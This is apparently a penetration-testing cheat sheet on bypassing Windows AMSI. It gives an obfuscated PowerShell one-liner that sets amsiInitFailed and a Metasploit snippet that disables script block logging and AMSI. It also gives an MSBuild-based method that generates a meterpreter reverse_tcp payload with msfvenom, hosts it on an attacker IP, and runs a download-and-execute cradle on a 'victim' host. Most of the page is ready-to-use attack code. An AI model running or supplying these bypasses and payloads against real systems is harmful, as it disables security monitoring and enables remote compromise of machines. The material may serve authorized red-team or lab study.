AMSI bypass

1 rasta-mouse bypass

This does not work if run from IEX (New-Object Net.WebClient).DownloadString(). It does work when copy and pasting into a powershell terminal, such as a nc64.exe reverse shell. Tested on Windows 10 1909, Server 2016 March 2020 update.

image info

source:
https://github.com/rasta-mouse/AmsiScanBufferBypass
https://eternallybored.org/misc/netcat/

2 Generic One Liner

Same as above, only works from copy and paste.

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]("{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

3 Metasploit web_delivery amsi bypass

Straight from msf web_delivery module.

 If($PSVersionTable.PSVersion.Major -ge 3){  $GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static'); If($GPF){ $GPC=$GPF.GetValue($null); If($GPC['ScriptB'+'lockLogging']){ $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0 } $val=[Collections.Generic.Dictionary[string,System.Object]]::new(); $val.Add('EnableScriptB'+'lockLogging',0); $val.Add('EnableScriptB'+'lockInvocationLogging',0); $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val } Else { [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])) }   $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils'); $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);  }  

4 MSBuild project

Need to use the 32bit msbuild.exe, and a 32bit msf psh-reflection payload. Does not seem to work with 64bit msbuild.exe + 64bit msf payload. This method can launch metasploit, covenant, nishang shell. Example: Payload: msf and pwn.csproj is hosted on http://10.10.10.10/

On Kali

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=443 -f psh-reflection -o msf
python3 -m http.server 80

Change this in pwn.csproj, line 70

String exec = "iex(new-object net.webclient).downloadstring('http://10.10.10.10/msf')"; // Modify for custom commands

On Windows victim

cd C:\Windows\System32\spool\drivers\color
iwr 10.10.10.10/pwn.csproj -ou pwn.csproj
cmd /c start C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSbuild.exe C:\Windows\System32\spool\drivers\color\pwn.csproj


https://github.com/MinatoTW/CLMBypassBlogpost
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/


back